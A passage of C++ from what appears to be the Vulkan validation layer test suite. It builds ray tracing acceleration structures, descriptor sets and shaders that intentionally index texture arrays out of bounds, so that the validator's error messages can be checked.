VK_STRUCTURE_TYPE_GEOMETRY_AABB_NV; geometry.geometry.aabbs.aabbData = aabb_buffer.handle(); geometry.geometry.aabbs.numAABBs = static_cast<uint32_t>(aabbs.size()); geometry.geometry.aabbs.offset = 0; geometry.geometry.aabbs.stride = static_cast<VkDeviceSize>(sizeof(AABB)); geometry.flags = 0; VkAccelerationStructureInfoNV bot_level_as_info = {}; bot_level_as_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_INFO_NV; bot_level_as_info.type = VK_ACCELERATION_STRUCTURE_TYPE_BOTTOM_LEVEL_NV; bot_level_as_info.instanceCount = 0; bot_level_as_info.geometryCount = 1; bot_level_as_info.pGeometries = &geometry; VkAccelerationStructureCreateInfoNV bot_level_as_create_info = {}; bot_level_as_create_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_CREATE_INFO_NV; bot_level_as_create_info.info = bot_level_as_info; VkAccelerationStructureObj bot_level_as(*m_device, bot_level_as_create_info); const std::vector<VkGeometryInstanceNV> instances = { VkGeometryInstanceNV{ { // clang-format off 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, 0.0f, 0.0f, 0.0f, 1.0f, 0.0f, // clang-format on }, 0, 0xFF, 0, VK_GEOMETRY_INSTANCE_TRIANGLE_CULL_DISABLE_BIT_NV, bot_level_as.opaque_handle(), }, }; VkDeviceSize instance_buffer_size = sizeof(VkGeometryInstanceNV) * instances.size(); VkBufferObj instance_buffer; instance_buffer.init(*m_device, instance_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV, {ray_tracing_queue_family_index}); uint8_t *mapped_instance_buffer_data = (uint8_t *)instance_buffer.memory().map(); std::memcpy(mapped_instance_buffer_data, (uint8_t *)instances.data(), static_cast<std::size_t>(instance_buffer_size)); instance_buffer.memory().unmap(); VkAccelerationStructureInfoNV top_level_as_info = {}; top_level_as_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_INFO_NV; top_level_as_info.type = VK_ACCELERATION_STRUCTURE_TYPE_TOP_LEVEL_NV; top_level_as_info.instanceCount = 1; top_level_as_info.geometryCount = 0; VkAccelerationStructureCreateInfoNV top_level_as_create_info = {}; top_level_as_create_info.sType = VK_STRUCTURE_TYPE_ACCELERATION_STRUCTURE_CREATE_INFO_NV; top_level_as_create_info.info = top_level_as_info; VkAccelerationStructureObj top_level_as(*m_device, top_level_as_create_info); VkDeviceSize scratch_buffer_size = std::max(bot_level_as.build_scratch_memory_requirements().memoryRequirements.size, top_level_as.build_scratch_memory_requirements().memoryRequirements.size); VkBufferObj scratch_buffer; scratch_buffer.init(*m_device, scratch_buffer_size, VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV); ray_tracing_command_buffer.begin(); // Build bot level acceleration structure ray_tracing_command_buffer.BuildAccelerationStructure(&bot_level_as, scratch_buffer.handle()); // Barrier to prevent using scratch buffer for top level build before bottom level build finishes VkMemoryBarrier memory_barrier = {}; memory_barrier.sType = VK_STRUCTURE_TYPE_MEMORY_BARRIER; memory_barrier.srcAccessMask = VK_ACCESS_ACCELERATION_STRUCTURE_READ_BIT_NV | VK_ACCESS_ACCELERATION_STRUCTURE_WRITE_BIT_NV; memory_barrier.dstAccessMask = VK_ACCESS_ACCELERATION_STRUCTURE_READ_BIT_NV | VK_ACCESS_ACCELERATION_STRUCTURE_WRITE_BIT_NV; ray_tracing_command_buffer.PipelineBarrier(VK_PIPELINE_STAGE_ACCELERATION_STRUCTURE_BUILD_BIT_NV, VK_PIPELINE_STAGE_ACCELERATION_STRUCTURE_BUILD_BIT_NV, 0, 1, &memory_barrier, 0, nullptr, 0, nullptr); // Build top level acceleration structure ray_tracing_command_buffer.BuildAccelerationStructure(&top_level_as, scratch_buffer.handle(), instance_buffer.handle()); ray_tracing_command_buffer.end(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &ray_tracing_command_buffer.handle(); vk::QueueSubmit(ray_tracing_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(ray_tracing_queue); m_errorMonitor->VerifyNotFound(); VkTextureObj texture(m_device, nullptr); VkSamplerObj sampler(m_device); VkDeviceSize storage_buffer_size = 1024; VkBufferObj storage_buffer; storage_buffer.init(*m_device, storage_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_STORAGE_BUFFER_BIT, {ray_tracing_queue_family_index}); VkDeviceSize shader_binding_table_buffer_size = ray_tracing_properties.shaderGroupHandleSize * 4ull; VkBufferObj shader_binding_table_buffer; shader_binding_table_buffer.init(*m_device, shader_binding_table_buffer_size, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, VK_BUFFER_USAGE_RAY_TRACING_BIT_NV, {ray_tracing_queue_family_index}); // Setup descriptors! const VkShaderStageFlags kAllRayTracingStages = VK_SHADER_STAGE_RAYGEN_BIT_NV | VK_SHADER_STAGE_ANY_HIT_BIT_NV | VK_SHADER_STAGE_CLOSEST_HIT_BIT_NV | VK_SHADER_STAGE_MISS_BIT_NV | VK_SHADER_STAGE_INTERSECTION_BIT_NV | VK_SHADER_STAGE_CALLABLE_BIT_NV; void *layout_pnext = nullptr; void *allocate_pnext = nullptr; VkDescriptorPoolCreateFlags pool_create_flags = 0; VkDescriptorSetLayoutCreateFlags layout_create_flags = 0; VkDescriptorBindingFlagsEXT ds_binding_flags[3] = {}; VkDescriptorSetLayoutBindingFlagsCreateInfoEXT layout_createinfo_binding_flags[1] = {}; if (descriptor_indexing) { ds_binding_flags[0] = 0; ds_binding_flags[1] = 0; ds_binding_flags[2] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT; layout_createinfo_binding_flags[0].sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_BINDING_FLAGS_CREATE_INFO_EXT; layout_createinfo_binding_flags[0].pNext = NULL; layout_createinfo_binding_flags[0].bindingCount = 3; layout_createinfo_binding_flags[0].pBindingFlags = ds_binding_flags; layout_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; pool_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; layout_pnext = layout_createinfo_binding_flags; } // Prepare descriptors OneOffDescriptorSet ds(m_device, { {0, VK_DESCRIPTOR_TYPE_ACCELERATION_STRUCTURE_NV, 1, kAllRayTracingStages, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, kAllRayTracingStages, nullptr}, {2, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 6, kAllRayTracingStages, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags); VkDescriptorSetVariableDescriptorCountAllocateInfoEXT variable_count = {}; uint32_t desc_counts; if (descriptor_indexing) { layout_create_flags = 0; pool_create_flags = 0; ds_binding_flags[2] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_VARIABLE_DESCRIPTOR_COUNT_BIT_EXT; desc_counts = 6; // We'll reserve 8 spaces in the layout, but the descriptor will only use 6 variable_count.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_VARIABLE_DESCRIPTOR_COUNT_ALLOCATE_INFO_EXT; variable_count.descriptorSetCount = 1; variable_count.pDescriptorCounts = &desc_counts; allocate_pnext = &variable_count; } OneOffDescriptorSet ds_variable(m_device, { {0, VK_DESCRIPTOR_TYPE_ACCELERATION_STRUCTURE_NV, 1, kAllRayTracingStages, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, kAllRayTracingStages, nullptr}, {2, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 8, kAllRayTracingStages, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags, allocate_pnext); VkAccelerationStructureNV top_level_as_handle = top_level_as.handle(); VkWriteDescriptorSetAccelerationStructureNV write_descript_set_as = {}; write_descript_set_as.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET_ACCELERATION_STRUCTURE_NV; write_descript_set_as.accelerationStructureCount = 1; write_descript_set_as.pAccelerationStructures = &top_level_as_handle; VkDescriptorBufferInfo descriptor_buffer_info = {}; descriptor_buffer_info.buffer = storage_buffer.handle(); descriptor_buffer_info.offset = 0; descriptor_buffer_info.range = storage_buffer_size; VkDescriptorImageInfo descriptor_image_infos[6] = {}; for (int i = 0; i < 6; i++) { descriptor_image_infos[i] = texture.DescriptorImageInfo(); descriptor_image_infos[i].sampler = sampler.handle(); descriptor_image_infos[i].imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; } VkWriteDescriptorSet descriptor_writes[3] = {}; descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[0].dstSet = ds.set_; descriptor_writes[0].dstBinding = 0; descriptor_writes[0].descriptorCount = 1; descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_ACCELERATION_STRUCTURE_NV; descriptor_writes[0].pNext = &write_descript_set_as; descriptor_writes[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[1].dstSet = ds.set_; descriptor_writes[1].dstBinding = 1; descriptor_writes[1].descriptorCount = 1; descriptor_writes[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER; descriptor_writes[1].pBufferInfo = &descriptor_buffer_info; descriptor_writes[2].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[2].dstSet = ds.set_; descriptor_writes[2].dstBinding = 2; if (descriptor_indexing) { descriptor_writes[2].descriptorCount = 5; // Intentionally don't write index 5 } else { descriptor_writes[2].descriptorCount = 6; } descriptor_writes[2].descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_writes[2].pImageInfo = descriptor_image_infos; vk::UpdateDescriptorSets(m_device->device(), 3, descriptor_writes, 0, NULL); if (descriptor_indexing) { descriptor_writes[0].dstSet = ds_variable.set_; descriptor_writes[1].dstSet = ds_variable.set_; descriptor_writes[2].dstSet = ds_variable.set_; vk::UpdateDescriptorSets(m_device->device(), 3, descriptor_writes, 0, NULL); } const VkPipelineLayoutObj pipeline_layout(m_device, {&ds.layout_}); const VkPipelineLayoutObj pipeline_layout_variable(m_device, {&ds_variable.layout_}); const auto SetImagesArrayLength = [](const std::string &shader_template, const std::string &length_str) { const std::string to_replace = "IMAGES_ARRAY_LENGTH"; std::string result = shader_template; auto position = result.find(to_replace); assert(position != std::string::npos); result.replace(position, to_replace.length(), length_str); return result; }; const std::string rgen_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 0) uniform accelerationStructureNV topLevelAS; layout(set = 0, binding = 1, std430) buffer RayTracingSbo { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 0) rayPayloadNV vec3 payload; layout(location = 3) callableDataNV vec3 callableData; void main() { sbo.rgen_ran = 1; executeCallableNV(0, 3); sbo.result1 = callableData.x; vec3 origin = vec3(0.0f, 0.0f, -2.0f); vec3 direction = vec3(0.0f, 0.0f, 1.0f); traceNV(topLevelAS, gl_RayFlagsNoneNV, 0xFF, 0, 1, 0, origin, 0.001, direction, 10000.0, 0); sbo.result2 = payload.x; traceNV(topLevelAS, gl_RayFlagsNoneNV, 0xFF, 0, 1, 0, origin, 0.001, -direction, 10000.0, 0); sbo.result3 = payload.x; if (sbo.rgen_index > 0) { // OOB here: sbo.result3 = texelFetch(textures[sbo.rgen_index], ivec2(0, 0), 0).x; } } )"; const std::string rgen_source = SetImagesArrayLength(rgen_source_template, "6"); const std::string rgen_source_runtime = SetImagesArrayLength(rgen_source_template, ""); const std::string ahit_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer StorageBuffer { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; hitAttributeNV vec3 hitValue; layout(location = 0) rayPayloadInNV vec3 payload; void main() { sbo.ahit_ran = 2; payload = vec3(0.1234f); if (sbo.ahit_index > 0) { // OOB here: payload.x = texelFetch(textures[sbo.ahit_index], ivec2(0, 0), 0).x; } } )"; const std::string ahit_source = SetImagesArrayLength(ahit_source_template, "6"); const std::string ahit_source_runtime = SetImagesArrayLength(ahit_source_template, ""); const std::string chit_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer RayTracingSbo { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 0) rayPayloadInNV vec3 payload; hitAttributeNV vec3 attribs; void main() { sbo.chit_ran = 3; payload = attribs; if (sbo.chit_index > 0) { // OOB here: payload.x = texelFetch(textures[sbo.chit_index], ivec2(0, 0), 0).x; } } )"; const std::string chit_source = SetImagesArrayLength(chit_source_template, "6"); const std::string chit_source_runtime = SetImagesArrayLength(chit_source_template, ""); const std::string miss_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : enable #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer RayTracingSbo { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 0) rayPayloadInNV vec3 payload; void main() { sbo.miss_ran = 4; payload = vec3(1.0, 0.0, 0.0); if (sbo.miss_index > 0) { // OOB here: payload.x = texelFetch(textures[sbo.miss_index], ivec2(0, 0), 0).x; } } )"; const std::string miss_source = SetImagesArrayLength(miss_source_template, "6"); const std::string miss_source_runtime = SetImagesArrayLength(miss_source_template, ""); const std::string intr_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer StorageBuffer { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; hitAttributeNV vec3 hitValue; void main() { sbo.intr_ran = 5; hitValue = vec3(0.0f, 0.5f, 0.0f); reportIntersectionNV(1.0f, 0); if (sbo.intr_index > 0) { // OOB here: hitValue.x = texelFetch(textures[sbo.intr_index], ivec2(0, 0), 0).x; } } )"; const std::string intr_source = SetImagesArrayLength(intr_source_template, "6"); const std::string intr_source_runtime = SetImagesArrayLength(intr_source_template, ""); const std::string call_source_template = R"(#version 460 #extension GL_EXT_nonuniform_qualifier : require #extension GL_EXT_samplerless_texture_functions : require #extension GL_NV_ray_tracing : require layout(set = 0, binding = 1, std430) buffer StorageBuffer { uint rgen_index; uint ahit_index; uint chit_index; uint miss_index; uint intr_index; uint call_index; uint rgen_ran; uint ahit_ran; uint chit_ran; uint miss_ran; uint intr_ran; uint call_ran; float result1; float result2; float result3; } sbo; layout(set = 0, binding = 2) uniform texture2D textures[IMAGES_ARRAY_LENGTH]; layout(location = 3) callableDataInNV vec3 callableData; void main() { sbo.call_ran = 6; callableData = vec3(0.1234f); if (sbo.call_index > 0) { // OOB here: callableData.x = texelFetch(textures[sbo.call_index], ivec2(0, 0), 0).x; } } )"; const std::string call_source = SetImagesArrayLength(call_source_template, "6"); const std::string call_source_runtime = SetImagesArrayLength(call_source_template, ""); struct TestCase { const std::string &rgen_shader_source; const std::string &ahit_shader_source; const std::string &chit_shader_source; const std::string &miss_shader_source; const std::string &intr_shader_source; const std::string &call_shader_source; bool variable_length; uint32_t rgen_index; uint32_t ahit_index; uint32_t chit_index; uint32_t miss_index; uint32_t intr_index; uint32_t call_index; const char *expected_error; }; std::vector<TestCase> tests; tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 25, 0, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 25, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 25, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 0, 25, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 0, 0, 25, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source, ahit_source, chit_source, miss_source, intr_source, call_source, false, 0, 0, 0, 0, 0, 25, "Index of 25 used to index descriptor array of length 6."}); if (descriptor_indexing) { tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 25, 0, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 25, 0, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 25, 0, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 25, 0, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 25, 0, "Index of 25 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 0, 25, "Index of 25 used to index descriptor array of length 6."}); // For this group, 6 is less than max specified (max specified is 8) but more than actual specified (actual specified is 5) tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 6, 0, 0, 0, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 6, 0, 0, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 6, 0, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 6, 0, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 6, 0, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 0, 6, "Index of 6 used to index descriptor array of length 6."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 5, 0, 0, 0, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 5, 0, 0, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 5, 0, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 5, 0, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 5, 0, "Descriptor index 5 is uninitialized."}); tests.push_back({rgen_source_runtime, ahit_source_runtime, chit_source_runtime, miss_source_runtime, intr_source_runtime, call_source_runtime, true, 0, 0, 0, 0, 0, 5, "Descriptor index 5 is uninitialized."}); } PFN_vkCreateRayTracingPipelinesNV vkCreateRayTracingPipelinesNV = reinterpret_cast<PFN_vkCreateRayTracingPipelinesNV>( vk::GetDeviceProcAddr(m_device->handle(), "vkCreateRayTracingPipelinesNV")); ASSERT_TRUE(vkCreateRayTracingPipelinesNV != nullptr); PFN_vkGetRayTracingShaderGroupHandlesNV vkGetRayTracingShaderGroupHandlesNV = reinterpret_cast<PFN_vkGetRayTracingShaderGroupHandlesNV>( vk::GetDeviceProcAddr(m_device->handle(), "vkGetRayTracingShaderGroupHandlesNV")); ASSERT_TRUE(vkGetRayTracingShaderGroupHandlesNV != nullptr); PFN_vkCmdTraceRaysNV vkCmdTraceRaysNV = reinterpret_cast<PFN_vkCmdTraceRaysNV>(vk::GetDeviceProcAddr(m_device->handle(), "vkCmdTraceRaysNV")); ASSERT_TRUE(vkCmdTraceRaysNV != nullptr); // Iteration 0 tests with no descriptor set bound (to sanity test "draw" validation). Iteration 1 // tests what's in the test case vector. for (int i = 0; i < 2; ++i) { for (const auto &test : tests) { if (i == 1) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test.expected_error); } VkShaderObj rgen_shader(m_device, test.rgen_shader_source.c_str(), VK_SHADER_STAGE_RAYGEN_BIT_NV, this, "main"); VkShaderObj ahit_shader(m_device, test.ahit_shader_source.c_str(), VK_SHADER_STAGE_ANY_HIT_BIT_NV, this, "main"); VkShaderObj chit_shader(m_device, test.chit_shader_source.c_str(), VK_SHADER_STAGE_CLOSEST_HIT_BIT_NV, this, "main"); VkShaderObj miss_shader(m_device, test.miss_shader_source.c_str(), VK_SHADER_STAGE_MISS_BIT_NV, this, "main"); VkShaderObj intr_shader(m_device, test.intr_shader_source.c_str(), VK_SHADER_STAGE_INTERSECTION_BIT_NV, this, "main"); VkShaderObj call_shader(m_device, test.call_shader_source.c_str(), VK_SHADER_STAGE_CALLABLE_BIT_NV, this, "main"); VkPipelineShaderStageCreateInfo stage_create_infos[6] = {}; stage_create_infos[0].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[0].stage = VK_SHADER_STAGE_RAYGEN_BIT_NV; stage_create_infos[0].module = rgen_shader.handle(); stage_create_infos[0].pName = "main"; stage_create_infos[1].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[1].stage = VK_SHADER_STAGE_ANY_HIT_BIT_NV; stage_create_infos[1].module = ahit_shader.handle(); stage_create_infos[1].pName = "main"; stage_create_infos[2].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[2].stage = VK_SHADER_STAGE_CLOSEST_HIT_BIT_NV; stage_create_infos[2].module = chit_shader.handle(); stage_create_infos[2].pName = "main"; stage_create_infos[3].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[3].stage = VK_SHADER_STAGE_MISS_BIT_NV; stage_create_infos[3].module = miss_shader.handle(); stage_create_infos[3].pName = "main"; stage_create_infos[4].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[4].stage = VK_SHADER_STAGE_INTERSECTION_BIT_NV; stage_create_infos[4].module = intr_shader.handle(); stage_create_infos[4].pName = "main"; stage_create_infos[5].sType = VK_STRUCTURE_TYPE_PIPELINE_SHADER_STAGE_CREATE_INFO; stage_create_infos[5].stage = VK_SHADER_STAGE_CALLABLE_BIT_NV; stage_create_infos[5].module = call_shader.handle(); stage_create_infos[5].pName = "main"; VkRayTracingShaderGroupCreateInfoNV group_create_infos[4] = {}; group_create_infos[0].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; group_create_infos[0].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_GENERAL_NV; group_create_infos[0].generalShader = 0; // rgen group_create_infos[0].closestHitShader = VK_SHADER_UNUSED_NV; group_create_infos[0].anyHitShader = VK_SHADER_UNUSED_NV; group_create_infos[0].intersectionShader = VK_SHADER_UNUSED_NV; group_create_infos[1].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; group_create_infos[1].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_GENERAL_NV; group_create_infos[1].generalShader = 3; // miss group_create_infos[1].closestHitShader = VK_SHADER_UNUSED_NV; group_create_infos[1].anyHitShader = VK_SHADER_UNUSED_NV; group_create_infos[1].intersectionShader = VK_SHADER_UNUSED_NV; group_create_infos[2].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; group_create_infos[2].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_PROCEDURAL_HIT_GROUP_NV; group_create_infos[2].generalShader = VK_SHADER_UNUSED_NV; group_create_infos[2].closestHitShader = 2; group_create_infos[2].anyHitShader = 1; group_create_infos[2].intersectionShader = 4; group_create_infos[3].sType = VK_STRUCTURE_TYPE_RAY_TRACING_SHADER_GROUP_CREATE_INFO_NV; group_create_infos[3].type = VK_RAY_TRACING_SHADER_GROUP_TYPE_GENERAL_NV; group_create_infos[3].generalShader = 5; // call group_create_infos[3].closestHitShader = VK_SHADER_UNUSED_NV; group_create_infos[3].anyHitShader = VK_SHADER_UNUSED_NV; group_create_infos[3].intersectionShader = VK_SHADER_UNUSED_NV; VkRayTracingPipelineCreateInfoNV pipeline_ci = {}; pipeline_ci.sType = VK_STRUCTURE_TYPE_RAY_TRACING_PIPELINE_CREATE_INFO_NV; pipeline_ci.stageCount = 6; pipeline_ci.pStages = stage_create_infos; pipeline_ci.groupCount = 4; pipeline_ci.pGroups = group_create_infos; pipeline_ci.maxRecursionDepth = 2; pipeline_ci.layout = test.variable_length ? pipeline_layout_variable.handle() : pipeline_layout.handle(); VkPipeline pipeline = VK_NULL_HANDLE; ASSERT_VK_SUCCESS( vkCreateRayTracingPipelinesNV(m_device->handle(), VK_NULL_HANDLE, 1, &pipeline_ci, nullptr, &pipeline)); std::vector<uint8_t> shader_binding_table_data; shader_binding_table_data.resize(static_cast<std::size_t>(shader_binding_table_buffer_size), 0); ASSERT_VK_SUCCESS(vkGetRayTracingShaderGroupHandlesNV(m_device->handle(), pipeline, 0, 4, static_cast<std::size_t>(shader_binding_table_buffer_size), shader_binding_table_data.data())); uint8_t *mapped_shader_binding_table_data = (uint8_t *)shader_binding_table_buffer.memory().map(); std::memcpy(mapped_shader_binding_table_data, shader_binding_table_data.data(), shader_binding_table_data.size()); shader_binding_table_buffer.memory().unmap(); ray_tracing_command_buffer.begin(); vk::CmdBindPipeline(ray_tracing_command_buffer.handle(), VK_PIPELINE_BIND_POINT_RAY_TRACING_NV, pipeline); if (i == 1) { vk::CmdBindDescriptorSets(ray_tracing_command_buffer.handle(), VK_PIPELINE_BIND_POINT_RAY_TRACING_NV, test.variable_length ? pipeline_layout_variable.handle() : pipeline_layout.handle(), 0, 1, test.variable_length ? &ds_variable.set_ : &ds.set_, 0, nullptr); } else { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdTraceRaysNV-None-02697"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-DescriptorSetNotBound"); } vkCmdTraceRaysNV(ray_tracing_command_buffer.handle(), 